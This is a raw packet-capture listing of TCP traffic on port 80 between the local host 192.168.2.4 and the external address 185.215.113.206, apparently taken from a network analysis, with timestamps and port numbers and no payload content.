Nov 15, 2024 14:09:25.671376944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.671386957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.671405077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.671416998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.672700882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.672717094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.672734022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.672750950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.672756910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.672770023 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.672800064 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.675865889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.675883055 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.675899029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.675914049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.675920010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.675929070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.675930977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.675959110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.675980091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.679548979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.679565907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.679583073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.679599047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.679600000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.679610014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.679629087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.679639101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.680628061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.680646896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.680660963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.680676937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.680692911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.680695057 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.680704117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.680735111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.682394981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.682411909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.682435989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.682444096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.682460070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.682481050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.684866905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.684969902 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.685175896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.685194016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.685209036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.685221910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.685226917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.685235023 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.685256004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.685275078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.687417984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.687436104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.687465906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.687482119 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.687612057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.687630892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.687645912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.687657118 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.687673092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.687684059 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.688564062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.688608885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.688613892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.688627005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.688652039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.688661098 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.689843893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.689862013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.689877987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.689898014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.689902067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.689908981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.689927101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.689938068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.765458107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.765535116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.765598059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.765615940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.765634060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.765646935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.765662909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.765678883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.766365051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.766386032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.766402960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.766417980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.766438007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.766438007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.767188072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.767205954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.767235041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.767236948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.767271042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.767360926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.768119097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.768137932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.768153906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.768167973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.768171072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.768179893 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.768198967 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.768208981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.769073963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.769092083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.769108057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.769120932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.769138098 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.769145012 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.770087957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.770107031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.770123005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.770136118 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.770150900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.770162106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.771084070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.771111012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.771126032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.771133900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.771142960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.771145105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.771167994 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.771177053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.772197962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.772216082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.772233009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.772247076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.772263050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.772274017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.773413897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.773432016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.773447037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.773468018 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.773483038 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.773492098 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.774487972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.774506092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.774528980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.774537086 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.774547100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.774547100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.774563074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.774581909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.775254011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.775270939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.775285006 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.775321960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.775355101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.776109934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776127100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776141882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776169062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.776200056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.776946068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776962996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776978016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776993036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.776995897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.777026892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.777053118 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.777698040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.777715921 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.777731895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.777751923 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.777771950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.778567076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.778583050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.778599024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.778626919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.778650999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.779494047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.779511929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.779526949 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.779542923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.779561996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.779582024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.779604912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.780311108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.780328989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.780344963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.780359983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.780375004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.780390024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.781354904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.781372070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.781387091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.781400919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.781419039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.782211065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.782228947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.782243967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.782259941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.782262087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.782285929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.782313108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.783246040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.783269882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.783287048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.783307076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.783319950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.784389973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.784408092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.784423113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.784440994 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.784456968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.785264969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.785281897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.785304070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.785312891 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.785320997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.785331964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.785351038 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.785362959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.787487030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787509918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787524939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787555933 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.787579060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.787914991 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787931919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787950039 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787965059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.787976980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.787995100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.790096998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.790113926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.790129900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.790146112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.790157080 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.790172100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.791078091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.791095018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.791110039 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.791124105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.791125059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.791135073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.791152000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.791167974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.792448044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.792465925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.792479038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.792495012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.792498112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.792511940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.792520046 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.792542934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.792566061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.793370962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.793387890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.793402910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.793420076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.793420076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.793430090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.793450117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.793458939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.794861078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.794878960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.794893026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.794909000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.794914007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.794925928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.794933081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.794939995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.794955969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.794970036 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.795591116 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.795608044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.795624018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.795639038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.795641899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.795654058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.795655966 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.795665979 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.795686960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.795700073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.796937943 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.796956062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.796983957 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.797002077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.797418118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.797435999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.797466040 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.797481060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.798785925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.798804045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.798831940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.798849106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.799503088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.799520016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.799549103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.799565077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.800700903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.800718069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.800733089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.800749063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.800760984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.800777912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.801789999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.801806927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.801836014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.801851988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.801903009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.801919937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.801934958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.801944017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.801956892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.802020073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.802814007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.802831888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.802846909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.802861929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.802862883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.802875042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.802895069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.802908897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.803828955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.803845882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.803859949 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.803884983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.803911924 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.804584980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.804600954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.804616928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.804636955 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.804652929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.805413961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.805432081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.805445910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.805459976 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.805463076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.805474043 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.805488110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.805509090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.806186914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.806202888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.806219101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.806256056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.806282997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.806883097 CET	80	49752	185.215.113.206	192.168.2.4
